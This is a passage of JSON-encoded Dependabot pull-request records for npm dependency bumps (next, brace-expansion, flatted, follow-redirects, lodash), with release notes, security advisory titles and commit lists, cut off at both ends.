chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `next` from 16.2.4 to 16.2.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vercel/next.js/releases\"\u003enext's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev16.2.6\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release contains security fixes and backported bug fixes. It does \u003cstrong\u003enot\u003c/strong\u003e include all pending features/changes on canary.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cp\u003eThe following advisories have been addressed:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eHigh:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6\"\u003eGHSA-26hh-7cqf-hhc6: Middleware / Proxy bypass in App Router applications via segment-prefetch routes - \u003cstrong\u003eIncomplete Fix Follow-Up\u003c/strong\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eModerate:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eLow:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCore Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: preserve HTTP access fallbacks during prerender recovery (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/92231\"\u003e#92231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix fallback route params case in app-page handler (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/91737\"\u003e#91737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix invalid HTML response for route-level RSC requests in deployment adapter (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/91541\"\u003e#91541\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePatch setHeader for direct route handlers (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93101\"\u003e#93101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude deployment id in \u003ccode\u003ecacheHandlers\u003c/code\u003e keys (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93453\"\u003e#93453\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix double-encoding of URL pathname parts in client param parsing (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93491\"\u003e#93491\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev16.2.5\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release contains security fixes and backported bug fixes. It does \u003cstrong\u003enot\u003c/strong\u003e include all pending features/changes on canary.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cp\u003eThe following advisories have been addressed:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eHigh:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/ee6e79b1792a4d401ddf2480f40a83549fe8e722\"\u003e\u003ccode\u003eee6e79b\u003c/code\u003e\u003c/a\u003e v16.2.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/afa053d9eb9c2a68c7eba43e84fe6bed8babcd45\"\u003e\u003ccode\u003eafa053d\u003c/code\u003e\u003c/a\u003e Turbopack: Match proxy matchers with webpack implementation (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93594\"\u003e#93594\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/97a154e5bbee0cb1ac3fb8aa4db66ac36e796e3d\"\u003e\u003ccode\u003e97a154e\u003c/code\u003e\u003c/a\u003e Turbopack: Fix middleware matcher suffix (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93590\"\u003e#93590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/83899bc89103d4df1479e065c7c1e09d4698a7b6\"\u003e\u003ccode\u003e83899bc\u003c/code\u003e\u003c/a\u003e [backport] Disable build caches for production/staging/force-preview deploys ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/7b222b90954d607fc28a34e9b360a9b1636bc206\"\u003e\u003ccode\u003e7b222b9\u003c/code\u003e\u003c/a\u003e [backport][test] Pin package manager to patch versions (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93595\"\u003e#93595\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/a8dc24f1fe23d4a22d24fac734837f7c824138f7\"\u003e\u003ccode\u003ea8dc24f\u003c/code\u003e\u003c/a\u003e [backport] Turbopack: more strict vergen setup (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93587\"\u003e#93587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/766148f9cd48c0e218acafcd0f15defc14871bf4\"\u003e\u003ccode\u003e766148f\u003c/code\u003e\u003c/a\u003e v16.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/0dd94836a8b43209fcfefa448c141683c22c1a27\"\u003e\u003ccode\u003e0dd9483\u003c/code\u003e\u003c/a\u003e fix: add explicit checks for RSC header (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/83\"\u003e#83\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/98\"\u003e#98\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/d166096c399c4fc4e09cd2d1bf26dca6579a855d\"\u003e\u003ccode\u003ed166096\u003c/code\u003e\u003c/a\u003e fix proxy matching for segment prefetch URLs (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/89\"\u003e#89\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/96\"\u003e#96\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/9d50c0b7190f59c470308578e12882788819f14c\"\u003e\u003ccode\u003e9d50c0b\u003c/code\u003e\u003c/a\u003e Strip next-resume header from incoming requests (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/92\"\u003e#92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vercel/next.js/compare/v16.2.2...v16.2.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for next since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/8bukets/8bukets/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/8bukets/8bukets/pull/2000","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/8bukets%2F8bukets/issues/2000","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2000/packages"}},{"old_version":"2.21.3","new_version":"removed","update_type":null,"path":null,"pr_created_at":"2026-05-07T08:39:12.000Z","version_change":"2.21.3 → removed","issue":{"uuid":"4397342442","node_id":"PR_kwDOBoKcOM7ZEbeV","number":909,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 7 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-22T08:47:58.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-07T08:39:12.000Z","updated_at":"2026-05-22T08:48:01.000Z","time_to_close":1296526,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":7,"packages":[{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.14","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"removed","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"flatted","old_version":"3.3.3","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"follow-redirects","old_version":"1.15.11","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"lodash","old_version":"4.17.23","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 5 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.14` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `removed` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.3` | `3.4.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.11` | `1.16.0` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.23` | `4.18.1` |\n\nBumps the npm_and_yarn group with 5 updates in the /packages/cicero-core directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.14` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `2.0.1` | `2.1.0` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.11` | `1.16.0` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.23` | `4.18.1` |\n| [picomatch](https://github.com/micromatch/picomatch) | `4.0.2` | `4.0.4` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nRemoves `@octokit/plugin-paginate-rest`\n\nUpdates `flatted` from 3.3.3 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.3.3...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.23 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via 